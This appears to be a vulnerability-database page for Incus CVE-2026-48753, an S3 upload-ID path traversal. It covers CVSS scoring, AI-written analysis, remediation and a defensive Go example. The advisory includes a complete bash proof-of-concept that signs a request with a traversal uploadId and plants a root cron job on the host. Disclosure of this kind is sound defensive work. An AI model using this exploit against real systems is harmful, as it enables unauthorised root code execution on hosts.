
Incus CVE-2026-48753

CRITICAL
External Control of File Name or Path (CWE-73)
2026-06-26 https://github.com/lxc/incus GHSA-ccjc-4qc3-jxqc
9.9
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory (primary source)
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Network-reachable S3 API with low complexity but mandatory bucket credentials (PR:L); host file write escapes the storage sandbox (S:C) and enables root RCE, giving full C/I/A:H.

CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

Source Code Evidence Fetched
Jun 26, 2026 - 19:22 vuln.today
Analysis Generated
Jun 26, 2026 - 19:22 vuln.today
CVE Published
Jun 26, 2026 - 18:47 github-advisory

Description (GitHub Advisory)

Summary

The S3 protocol upload endpoint is vulnerable to path traversal and allows creation of arbitrary files on the host. This behavior could lead to arbitrary command execution.

In internal/server/storage/s3/local/multipart.go, the user-controlled upload ID is appended to the uploads directory without sanitization: https://github.com/lxc/incus/blob/40dd4f151d52c06b178482aa2518abfb9df3e6fb/internal/server/storage/s3/local/multipart.go#L33

PoC

Setup

# Expose the S3 API and create a bucket
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
#> note the credentials

Exploitation

The script below was mostly generated.

#!/usr/bin/env bash
set -euo pipefail

if [ $# -lt 4 ]; then
	printf 'usage: $0 endpoint bucket access-key secret-key\n' >&2
	exit 1
fi

endpoint="${1%/}"
bucket="${2}"
access="${3}"
secret="${4}"

region="us-east-1"
service="s3"
key="anything"
part="1"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
target="/etc/cron.d/part-00001"
cmd="id > /incus-s3-uploadid-bash-rce; rm -f $target"
body="* * * * * root /bin/sh -c '$cmd'
"

uri_path="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://[^/]+##')/$bucket/$key"
uri_path="${uri_path#/}"
uri_path="/$uri_path"
host="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://([^/]+).*#\1#')"
qs="partNumber=$part&uploadId=${upload_id//\//%2F}"
url="$endpoint/$bucket/$key?$qs"

amz_date=$(date -u +%Y%m%dT%H%M%SZ)
date_scope="${amz_date:0:8}"
scope="$date_scope/$region/$service/aws4_request"
body_hash=$(printf '%s' "$body" | sha256sum | awk '{print $1}')
signed="host;x-amz-content-sha256;x-amz-date"

canonical="PUT
$uri_path
$qs
host:$host
x-amz-content-sha256:$body_hash
x-amz-date:$amz_date

$signed
$body_hash"
canonical_hash="$(printf '%s' "$canonical" | sha256sum | awk '{print $1}')"
string_to_sign="AWS4-HMAC-SHA256
$amz_date
$scope
$canonical_hash"

hmac_hex() {
	printf '%s' "${2}" | openssl dgst -sha256 -mac HMAC -macopt "hexkey:${1}" -binary | xxd -p -c 256
}

k_date=$(printf 'AWS4%s' "$secret" | xxd -p -c 256)
k_date=$(hmac_hex "$k_date" "$date_scope")
k_region=$(hmac_hex "$k_date" "$region")
k_service=$(hmac_hex "$k_region" "$service")
k_signing=$(hmac_hex "$k_service" "aws4_request")
sig=$(hmac_hex "$k_signing" "$string_to_sign")
auth="AWS4-HMAC-SHA256 Credential=${access}/${scope},SignedHeaders=${signed},Signature=${sig}"

printf '
# body:\n%s' "${body}"

curl -ksS -X PUT "${url}" \
	-H "Host: ${host}" \
	-H "X-Amz-Date: ${amz_date}" \
	-H "X-Amz-Content-Sha256: ${body_hash}" \
	-H "Authorization: ${auth}" \
	--data-binary "${body}"

Impact

Arbitrary file write on the host, possibly leading to arbitrary command execution.
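As an added illustration written from a defender's view (my own Go, not Incus source and not the advisory's code): the unchecked join that produces this bug class, beside a hardened version that allow-lists the upload ID and then confirms the resulting path is still contained in the uploads directory. The input is fed through the percent-decoded query string the way a Go handler sees it, because the PoC above encodes "/" as "%2F"; a check or a log search applied to the raw, still-encoded request would miss the "../" chain. The uploads directory, the allowed ID pattern and every function name here are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"regexp"
	"strings"
)

// Illustrative reconstruction of the bug class, NOT Incus source code: an
// attacker-controlled upload ID is joined onto the uploads directory with no
// validation, so a "../" chain resolves to any host path the daemon can write.
func vulnerablePartPath(uploadsDir, uploadID string, partNumber int) string {
	return filepath.Join(uploadsDir, uploadID, fmt.Sprintf("part-%05d", partNumber))
}

// uploadIDPattern is an assumed allow-list: an ID the server itself minted is
// an opaque token, so anything outside this character set is rejected outright.
var uploadIDPattern = regexp.MustCompile(`^[A-Za-z0-9._-]{1,128}$`)

var errBadUploadID = errors.New("invalid uploadId")

// safePartPath is the hardened form: allow-list the ID first, then confirm
// as defense in depth that the cleaned path is still inside uploadsDir.
func safePartPath(uploadsDir, uploadID string, partNumber int) (string, error) {
	if uploadID == "." || uploadID == ".." || !uploadIDPattern.MatchString(uploadID) {
		return "", errBadUploadID
	}
	base := filepath.Clean(uploadsDir)
	p := filepath.Join(base, uploadID, fmt.Sprintf("part-%05d", partNumber))
	rel, err := filepath.Rel(base, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errBadUploadID
	}
	return p, nil
}

// uploadIDFromQuery returns the uploadId the way a Go handler sees it:
// url.ParseQuery percent-decodes, so the "%2F" the PoC sends arrives as "/".
// Any check done on the raw, still-encoded query string would miss "../".
func uploadIDFromQuery(rawQuery string) (string, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", err
	}
	return q.Get("uploadId"), nil
}

func main() {
	// Constructed inputs: a placeholder uploads directory and the PoC's
	// query shape with a shortened traversal chain.
	const uploadsDir = "/var/lib/placeholder/uploads"
	const rawQuery = "partNumber=1&uploadId=..%2F..%2F..%2F..%2Fetc%2Fcron.d"

	id, err := uploadIDFromQuery(rawQuery)
	if err != nil {
		panic(err)
	}
	fmt.Println("decoded uploadId:", id)
	fmt.Println("unchecked join  :", vulnerablePartPath(uploadsDir, id, 1))
	if _, err := safePartPath(uploadsDir, id, 1); err != nil {
		fmt.Println("hardened check  :", err)
	}
	if p, err := safePartPath(uploadsDir, "a1b2c3", 1); err == nil {
		fmt.Println("legit upload    :", p)
	}
}
```

The allow-list is the real control: a server-minted upload ID never legitimately contains a path separator or a dot-dot component, so rejecting on the character set is both simpler and stricter than trying to normalize a traversal away. The filepath.Rel containment check stays in place as a second line of defense in case the ID format is ever relaxed.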

Analysis (AI)

Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. …


Attack Chain (AI derived)

Hypothetical attack flow derived from CVE metadata

Access: obtain valid S3 bucket credentials
Delivery: craft a SigV4-signed multipart PUT with a traversal uploadId
Exploit: bypass uploads-directory containment via '../'
Execution: write the part body to /etc/cron.d on the host
Persist: root cron executes the payload
Impact: host compromise / RCE

Vulnerability Assessment (AI)

Exploitation

Requires three concrete preconditions taken from the description and PoC: (1) the Incus S3 API must be explicitly enabled via core.storage_buckets_address (off by default), (2) at least one storage bucket must exist, and (3) the attacker must hold valid bucket access-key/secret-key credentials to produce a SigV4-signed request (PR:L, authenticated). …

Risk Assessment

The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects a low-complexity, network-reachable attack that nonetheless requires some privilege (PR:L), specifically valid S3 bucket credentials, and produces a scope change (writing host files outside the storage sandbox). …

Exploit Scenario

An attacker who has been issued (or has stolen) S3 access/secret keys for any Incus bucket sends a signed PUT multipart-upload request whose uploadId is a long '../../../etc/cron.d' traversal string, causing the uploaded part body to be written as /etc/cron.d/part-00001. The cron file runs an attacker command as root on the next schedule tick, yielding host compromise. …

Remediation

Upgrade to Incus 7.1.0 or later, which contains the vendor-released fix (see advisory GHSA-ccjc-4qc3-jxqc at https://github.com/lxc/incus/security/advisories/GHSA-ccjc-4qc3-jxqc). …

Recommended Action (AI)

Within 24 hours: Inventory all Incus deployments with S3 storage backend on versions before 7.1.0; disable S3 storage or isolate systems from untrusted networks; audit S3 credential usage in access logs. …


